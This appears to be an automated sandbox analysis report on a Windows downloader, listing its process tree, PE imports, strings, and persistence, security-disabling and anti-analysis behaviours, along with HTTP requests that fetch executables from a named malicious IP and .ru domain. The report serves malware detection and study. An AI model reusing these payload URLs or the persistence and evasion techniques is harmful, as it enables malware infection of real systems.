binary: C:\Users\user\AppData\Local\Temp\3527325130.exe
binary: C:\Users\user\AppData\Local\Temp\2658928598.exe
binary: C:\Users\user\AppData\Local\Temp\3843231898.exe
binary: C:\Users\user\AppData\Local\Temp\4089713972.exe
HTTP traffic contains suspicious features which may be indicative of malware related traffic
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://92.63.197.48/m/1.exe
suspicious_request: http://92.63.197.48/m/2.exe
suspicious_request: http://92.63.197.48/m/3.exe
suspicious_request: http://92.63.197.48/m/4.exe
suspicious_request: http://92.63.197.48/m/5.exe
Performs some HTTP requests
url: http://slpsrgpsrhojifdij.ru/1.exe
url: http://slpsrgpsrhojifdij.ru/2.exe
url: http://slpsrgpsrhojifdij.ru/3.exe
url: http://slpsrgpsrhojifdij.ru/4.exe
url: http://slpsrgpsrhojifdij.ru/5.exe
url: http://92.63.197.48/m/1.exe
url: http://92.63.197.48/m/2.exe
url: http://92.63.197.48/m/3.exe
url: http://92.63.197.48/m/4.exe
url: http://92.63.197.48/m/5.exe
The binary likely contains encrypted or compressed data.
section: name: .text, entropy: 6.83, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x00019c00, virtual_size: 0x00019a10
Attempts to remove evidence of file being downloaded from the Internet
file: C:\Users\user\AppData\Local\Temp\Izu2hJvy.exe:Zone.Identifier
Attempts to repeatedly call a single API many times in order to delay analysis time
Spam: 2658928598.exe (2628) called API NtClose 500152 times
Installs itself for autorun at Windows startup
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
data: C:\Windows\5769805074060605\winsvcs.exe
key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
data: C:\Windows\5769805074060605\winsvcs.exe
Creates a hidden or system file
file: C:\Windows\5769805074060605
file: C:\Windows\5769805074060605\winsvcs.exe
Operates on local firewall's policies and settings
Creates a copy of itself
copy: C:\Windows\5769805074060605\winsvcs.exe
Attempts to disable System Restore
Attempts to modify or disable Security Center warnings

Screenshots


Hosts

Direct IP Country Name
N 92.63.197.48 [VT] Russian Federation
Y 8.8.8.8 [VT] United States

DNS

Name Response Post-Analysis Lookup
slpsrgpsrhojifdij.ru [VT] A 92.63.197.48 [VT]

Summary

C:\Users\user\AppData\Local\Temp\msvcr100.dll
C:\Windows\System32\msvcr100.dll
C:\Windows\system\msvcr100.dll
C:\Windows\msvcr100.dll
C:\Windows\System32\wbem\msvcr100.dll
C:\Windows\System32\WindowsPowerShell\v1.0\msvcr100.dll
C:\Users\user\AppData\Local\Temp\Izu2hJvy.exe:Zone.Identifier
C:\Windows\5769805074060605\winsvcs.exe
C:\Windows\5769805074060605
C:\Users\user\AppData\Local\Temp\Izu2hJvy.exe
C:\Windows\5769805074060605\msvcr100.dll
C:\Windows\5769805074060605\winsvcs.exe:Zone.Identifier
\Device\KsecDD
C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\System32\ras\*.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
C:\Users\user\AppData\Local\Temp\3635423912.exe
C:\Users\user\AppData\Local\Temp\2658928598.exe
C:\Users\user\AppData\Local\Temp\3635423912.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3843231898.exe
C:\Users\user\AppData\Local\Temp\3843231898.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2658928598.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\4089713972.exe
C:\Users\user\AppData\Local\Temp\4089713972.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3527325130.exe
C:\Users\user\AppData\Local\Temp\3527325130.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\Izu2hJvy.exe
\Device\KsecDD
C:\Windows\5769805074060605\winsvcs.exe
C:\Windows\5769805074060605\winsvcs.exe
C:\Users\user\AppData\Local\Temp\3635423912.exe
C:\Users\user\AppData\Local\Temp\2658928598.exe
C:\Users\user\AppData\Local\Temp\3843231898.exe
C:\Users\user\AppData\Local\Temp\4089713972.exe
C:\Users\user\AppData\Local\Temp\3527325130.exe
C:\Users\user\AppData\Local\Temp\Izu2hJvy.exe:Zone.Identifier
C:\Windows\5769805074060605\winsvcs.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3635423912.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3843231898.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\2658928598.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\4089713972.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3527325130.exe:Zone.Identifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AutoUpdateDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableFileTracing
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileTracingMask
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableConsoleTracing
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\ConsoleTracingMask
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\MaxFileSize
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileDirectory
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableFileTracing
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileTracingMask
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableConsoleTracing
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\ConsoleTracingMask
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\MaxFileSize
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
\xeb\xa7\x80\xc8\x8aEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AutoUpdateDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableFileTracing
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileTracingMask
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableConsoleTracing
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\ConsoleTracingMask
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\MaxFileSize
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileDirectory
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableFileTracing
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileTracingMask
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableConsoleTracing
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\ConsoleTracingMask
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\MaxFileSize
\xeb\xa7\x80\xc8\x8aEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
\xeb\xa7\x80\xc8\x8aEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AutoUpdateDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
kernel32.dll.FlsAlloc
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.FlsFree
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.Module32FirstW
kernel32.dll.GlobalAlloc
kernel32.dll.LoadLibraryA
kernel32.dll.VirtualAlloc
kernel32.dll.VirtualProtect
kernel32.dll.VirtualFree
kernel32.dll.GetVersionExA
kernel32.dll.TerminateProcess
kernel32.dll.ExitProcess
kernel32.dll.SetErrorMode
msvcrt.dll._controlfp
msvcrt.dll._except_handler3
msvcrt.dll.__set_app_type
msvcrt.dll.__p__fmode
msvcrt.dll.memset
msvcrt.dll.__p__commode
msvcrt.dll._adjust_fdiv
msvcrt.dll.__setusermatherr
msvcrt.dll._initterm
msvcrt.dll.__getmainargs
msvcrt.dll._acmdln
msvcrt.dll.exit
msvcrt.dll._XcptFilter
msvcrt.dll._exit
msvcrt.dll._snprintf
msvcrt.dll.fclose
msvcrt.dll.fseek
msvcrt.dll.ftell
msvcrt.dll.srand
msvcrt.dll.rand
msvcrt.dll._wfopen
msvcrt.dll._snwprintf
wininet.dll.HttpQueryInfoA
wininet.dll.InternetCloseHandle
wininet.dll.InternetReadFile
wininet.dll.InternetOpenUrlW
wininet.dll.InternetOpenW
wininet.dll.InternetOpenUrlA
wininet.dll.InternetOpenA
urlmon.dll.URLDownloadToFileW
shlwapi.dll.PathFindFileNameW
shlwapi.dll.PathFindFileNameA
shlwapi.dll.PathFileExistsW
kernel32.dll.ExitThread
kernel32.dll.CreateFileW
kernel32.dll.GetModuleFileNameW
kernel32.dll.Sleep
kernel32.dll.WriteFile
kernel32.dll.GetTickCount
kernel32.dll.CloseHandle
kernel32.dll.GetLastError
kernel32.dll.CreateMutexA
kernel32.dll.SetFileAttributesW
kernel32.dll.CreateThread
kernel32.dll.GetModuleHandleA
kernel32.dll.GetStartupInfoA
kernel32.dll.DeleteFileW
kernel32.dll.ExpandEnvironmentStringsW
kernel32.dll.CreateProcessW
kernel32.dll.CreateDirectoryW
kernel32.dll.CopyFileW
advapi32.dll.RegSetValueExW
advapi32.dll.RegCloseKey
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegCreateKeyExA
advapi32.dll.RegQueryValueExW
shell32.dll.ShellExecuteW
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
cryptbase.dll.SystemFunction036
ole32.dll.CoInitializeEx
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
ole32.dll.CoCreateInstance
iphlpapi.dll.GetAdaptersAddresses
dhcpcsvc.dll.DhcpRequestParams
ole32.dll.CoUninitialize
oleaut32.dll.#500
C:\Windows\5769805074060605\winsvcs.exe
C:\Users\user\AppData\Local\Temp\3635423912.exe
C:\Users\user\AppData\Local\Temp\3843231898.exe
C:\Users\user\AppData\Local\Temp\2658928598.exe
C:\Users\user\AppData\Local\Temp\4089713972.exe
608605743
IESQMMUTEX_0_208

Binary Entropy

PE Information

Image Base 0x00400000
Entry Point 0x00407e9d
Reported Checksum 0x00027747
Actual Checksum 0x00027747
Minimum OS Version 5.1
Compile Time 2017-12-13 13:38:41
Import Hash 7fcc8b9d7ca1591b5c9cd6b043691cb9

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x00019a10 0x00019c00 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.83
.data 0x0001b000 0x0001fba8 0x00005e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.87
.mysec3 0x0003b000 0x00000005 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.mysec 0x0003c000 0x0000100a 0x00000400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 0.00
.mysec10 0x0003e000 0x00000064 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.rsrc 0x0003f000 0x00001d62 0x00001e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.81
.reloc 0x00041000 0x00000ece 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 5.91

Imports

Library KERNEL32.dll:
0x401000 LocalFree
0x401004 GetLastError
0x401008 AddAtomW
0x401010 ExitProcess
0x401014 AddAtomA
0x401018 SetLastError
0x401020 GetStartupInfoA
0x401024 VirtualProtect
0x401028 GetProcAddress
0x40102c LoadLibraryA
0x401030 GetACP
0x401034 GlobalMemoryStatus
0x401038 GetCPInfo
0x40103c GetSystemTimes
0x401044 GetTickCount
0x401048 GetModuleHandleW
0x40104c EnumSystemLocalesA
0x401050 GetLocaleInfoA
0x401054 GetCommandLineA
0x401058 HeapSetInformation
0x40105c GetStartupInfoW
0x401064 EncodePointer
0x401068 DecodePointer
0x40106c HeapFree
0x401070 TlsAlloc
0x401074 TlsGetValue
0x401078 TlsSetValue
0x40107c TlsFree
0x401084 GetCurrentThreadId
0x40108c GetCurrentThread
0x401094 WriteFile
0x401098 GetStdHandle
0x40109c GetModuleFileNameW
0x4010a0 GetModuleFileNameA
0x4010a8 WideCharToMultiByte
0x4010b0 SetHandleCount
0x4010b8 GetFileType
0x4010c0 HeapCreate
0x4010c4 HeapDestroy
0x4010cc GetCurrentProcessId
0x4010d4 RaiseException
0x4010d8 GetOEMCP
0x4010dc IsValidCodePage
0x4010e4 IsDebuggerPresent
0x4010e8 TerminateProcess
0x4010ec GetCurrentProcess
0x4010f4 FatalAppExitA
0x4010fc Sleep
0x401104 FreeLibrary
0x401108 InterlockedExchange
0x40110c LoadLibraryW
0x401110 GetLocaleInfoW
0x401114 RtlUnwind
0x401118 LCMapStringW
0x40111c MultiByteToWideChar
0x401120 GetStringTypeW
0x401124 HeapAlloc
0x401128 HeapReAlloc
0x40112c HeapSize
0x401130 GetUserDefaultLCID
0x401134 IsValidLocale
Library USER32.dll:
0x40113c PeekMessageA

.text
`.data
.mysec3
.mysec
`.mysec10d
.rsrc
@.reloc
GlobalAlloc
kernel32.dll
@Module32FirstW
CreateToolhelp32Snapshot
floor
exp10
?acos
log10
e+000
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
CorExitProcess
_nextafter
_logb
frexp
_hypot
_cabs
ldexp
atan2
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
SystemFunction036
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
LC_TIME
LC_NUMERIC
LC_MONETARY
LC_CTYPE
LC_COLLATE
LC_ALL
1#QNAN
1#INF
1#IND
1#SNAN
united-states
united-kingdom
trinidad & tobago
south-korea
south-africa
south korea
south africa
slovak
puerto-rico
pr-china
pr china
new-zealand
hong-kong
holland
great britain
england
czech
china
britain
america
swiss
swedish-finland
spanish-venezuela
spanish-uruguay
spanish-puerto rico
spanish-peru
spanish-paraguay
spanish-panama
spanish-nicaragua
spanish-modern
spanish-mexican
spanish-honduras
spanish-guatemala
spanish-el salvador
spanish-ecuador
spanish-dominican republic
spanish-costa rica
spanish-colombia
spanish-chile
spanish-bolivia
spanish-argentina
portuguese-brazilian
norwegian-nynorsk
norwegian-bokmal
norwegian
italian-swiss
irish-english
german-swiss
german-luxembourg
german-lichtenstein
german-austrian
french-swiss
french-luxembourg
french-canadian
french-belgian
english-usa
english-us
english-uk
english-trinidad y tobago
english-south africa
english-nz
english-jamaica
english-ire
english-caribbean
english-can
english-belize
english-aus
english-american
dutch-belgian
chinese-traditional
chinese-singapore
chinese-simplified
chinese-hongkong
chinese
canadian
belgian
australian
american-english
american english
american
Norwegian-Nynorsk
#6*?.
65/%6
&3+726
&62-9$/
#"6.;
=+6))
(>9=8
8$>$>
;).,/
YQPVh
SVWUj
QW@Ph
LocalFree
GetLastError
AddAtomW
GetCurrentDirectoryA
ExitProcess
AddAtomA
SetLastError
GetProcessShutdownParameters
GetStartupInfoA
VirtualProtect
GetProcAddress
LoadLibraryA
GetACP
GlobalMemoryStatus
GetCPInfo
GetSystemTimes
FillConsoleOutputCharacterW
GetTickCount
GetModuleHandleW
KERNEL32.dll
PeekMessageA
USER32.dll
GetCommandLineA
HeapSetInformation
GetStartupInfoW
IsProcessorFeaturePresent
EncodePointer
DecodePointer
HeapFree
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
InterlockedIncrement
GetCurrentThreadId
InterlockedDecrement
GetCurrentThread
SetUnhandledExceptionFilter
WriteFile
GetStdHandle
GetModuleFileNameW
GetModuleFileNameA
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStringsW
SetHandleCount
InitializeCriticalSectionAndSpinCount
GetFileType
DeleteCriticalSection
HeapCreate
HeapDestroy
QueryPerformanceCounter
GetCurrentProcessId
GetSystemTimeAsFileTime
RaiseException
GetOEMCP
IsValidCodePage
UnhandledExceptionFilter
IsDebuggerPresent
TerminateProcess
GetCurrentProcess
LeaveCriticalSection
FatalAppExitA
EnterCriticalSection
Sleep
SetConsoleCtrlHandler
FreeLibrary
InterlockedExchange
LoadLibraryW
GetLocaleInfoW
RtlUnwind
LCMapStringW
MultiByteToWideChar
GetStringTypeW
HeapAlloc
HeapReAlloc
HeapSize
GetUserDefaultLCID
GetLocaleInfoA
EnumSystemLocalesA
IsValidLocale
dizerafasuma
tevakuvokogumiwubotahutucozame
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
Yubokejuni. Kudihube kopukafoloze pi yiwa yayeha. Cubenegi jugudanepi kotigo di muwusocudiwuze. Mikeva sohirova.Tuya. Dolezosiwa yu humunicidu ladipibawe. Sa cavawice wecotuwijaharo rajuco. Zi bubajocejeda macaviye yojelefuwa hokenonohu. Wumipu tedi mabozodeseyile meje vuxotipufiteyi. Yapelitaya. Zukesi. Javobohisabiyo hoxu cojanu kazaha. Vi wexe peniwanegi. Kicudo (
6$7(7074787<7
X>\>`>d>h>l>p>t>x>|>
kernel32.dll
KERNEL32.DLL
mscoree.dll
runtime error
@Microsoft Visual C++ Runtime Library
<program name unknown>
Program:
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
ADVAPI32.DLL
WUSER32.DLL
Kesodoxofezavu
VS_VERSION_INFO
StringFileInfo
457aa56b
FileVersion
3.4.6.86
InternalName
mukuge.exe
LegalCopyright
Copyright (C) 2018, vasupejen
ProductVersion
3.4.6.86
VarFileInfo
Translation
This file is not on VirusTotal.

Process Tree


Izu2hJvy.exe, PID: 1900, Parent PID: 2584
Full Path: C:\Users\user\AppData\Local\Temp\Izu2hJvy.exe
Command Line: "C:\Users\user\AppData\Local\Temp\Izu2hJvy.exe"
winsvcs.exe, PID: 3040, Parent PID: 1900
Full Path: C:\Windows\5769805074060605\winsvcs.exe
Command Line: C:\Windows\5769805074060605\winsvcs.exe
3635423912.exe, PID: 840, Parent PID: 3040
Full Path: C:\Users\user\AppData\Local\Temp\3635423912.exe
Command Line: C:\Users\user\AppData\Local\Temp\3635423912.exe
3843231898.exe, PID: 2300, Parent PID: 3040
Full Path: C:\Users\user\AppData\Local\Temp\3843231898.exe
Command Line: C:\Users\user\AppData\Local\Temp\3843231898.exe
2658928598.exe, PID: 2628, Parent PID: 3040
Full Path: C:\Users\user\AppData\Local\Temp\2658928598.exe
Command Line: C:\Users\user\AppData\Local\Temp\2658928598.exe
4089713972.exe, PID: 2416, Parent PID: 3040
Full Path: C:\Users\user\AppData\Local\Temp\4089713972.exe
Command Line: C:\Users\user\AppData\Local\Temp\4089713972.exe
3527325130.exe, PID: 2084, Parent PID: 3040
Full Path: C:\Users\user\AppData\Local\Temp\3527325130.exe
Command Line: C:\Users\user\AppData\Local\Temp\3527325130.exe

Hosts

Direct IP Country Name
N 92.63.197.48 [VT] Russian Federation
Y 8.8.8.8 [VT] United States

TCP

Source Source Port Destination Destination Port
192.168.35.22 49167 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.22 49168 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.22 49169 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.22 49170 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.22 49173 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.22 49174 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.22 49175 92.63.197.48 slpsrgpsrhojifdij.ru 80

UDP

Source Source Port Destination Destination Port
192.168.35.22 58774 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
slpsrgpsrhojifdij.ru [VT] A 92.63.197.48 [VT]

HTTP Requests

URI Data
http://slpsrgpsrhojifdij.ru/1.exe
GET /1.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/2.exe
GET /2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/3.exe
GET /3.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/4.exe
GET /4.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/5.exe
GET /5.exe HTTP/1.1
